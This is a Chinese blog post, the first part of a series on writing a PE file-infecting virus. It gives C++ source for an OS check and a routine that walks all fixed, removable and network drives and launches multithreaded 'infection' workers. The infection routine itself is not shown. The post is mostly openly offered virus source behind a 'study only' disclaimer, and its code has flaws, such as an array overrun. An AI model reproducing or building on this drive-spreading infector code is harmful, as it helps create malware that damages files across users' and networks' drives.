PE型感染病毒 —— 遍历磁盘驱动器 （1）

前天某同事的U盘中毒，在10分钟内感染了近2G（大约一百个EXE安装文件，相当于5秒左右感染一个PE文件）。确实佩服这速度，于是WS32DSM反汇编，虽然我看不懂反汇编代码，但也只好硬着头皮揣摩一下思路并试试~~~

 

感染前需要遍历驱动驱动器，下面是自己山寨的一份：

 

1、判断操作系统

 

如果是Windows 98/Me/95/CE或以下的系统则直接退出：

 

/************************************************************************/ /* 函数说明：判断操作系统版本 /* 参 数：无 /* 返 回 值：NT以上版本的系统返回TRUE，失败返回FALSE /* By:Koma 2009.12.16 23:35 /************************************************************************/ BOOL CTestDlg::GetOSVersion() { DWORD dwVersion = 0; // 如果是Windows 98/Me/95以上的操作系统则返回TRUE dwVersion = GetVersion(); if (dwVersion < 0x80000000) { return TRUE; } return FALSE; }

 

2、遍历磁盘驱动器：

开始遍历全部的磁盘驱动器，包括本地磁盘、网络磁盘、移动磁盘：

/************************************************************************/ /* 函数说明：多线程感染全盘文件 /* 参 数：无 /* 返 回 值：无 /* By:Koma 2009.12.17 0:40 /************************************************************************/ void CTestDlg::EmuAllDisk() { CString strTemp; // 临时字符串 UINT revtype; // 磁盘类型 char name[5]= "C:"; // 磁盘名称 int nCount = 0; // 磁盘数量 HANDLE hThread[10]; // 最大启动十个磁盘感染线程 DWORD dwTid[10]; // 线程PID DiskInfo di; // 设置盘符名 for(BYTE i=0x42;i<0x5B;i=i+0x01) // 遍历所有盘符 { name[0]=i; revtype=GetDriveType(name); switch(revtype){ // 判断磁盘驱动器的属性 case DRIVE_FIXED: // 是否为本地磁盘 case DRIVE_REMOVABLE: // 是否为可移动磁盘 case DRIVE_REMOTE: // 是否为网络磁盘 if(nCount>10){ // 最大启动十个线程 nCount = 0; // 恢复计数器 Sleep(30000); // 休眠30秒 break; } strTemp.Format("%c",name[0]); strTemp = strTemp + ":"; // 磁盘字符串形式，如C: di.m_strName = strTemp; // 设置感染文件的绝对路径 hThread[nCount] = CreateThread (NULL, 0, ThreadInject,(LPVOID)(&di),NULL,&dwTid[nCount]); nCount++; break; } } }

 

以上代码的效率有待优化，希望能与你一起交流并提出宝贵的意见 ！

 

（文章仅供学习交流，请不要用作非法用途，否则与本人、本站无关！）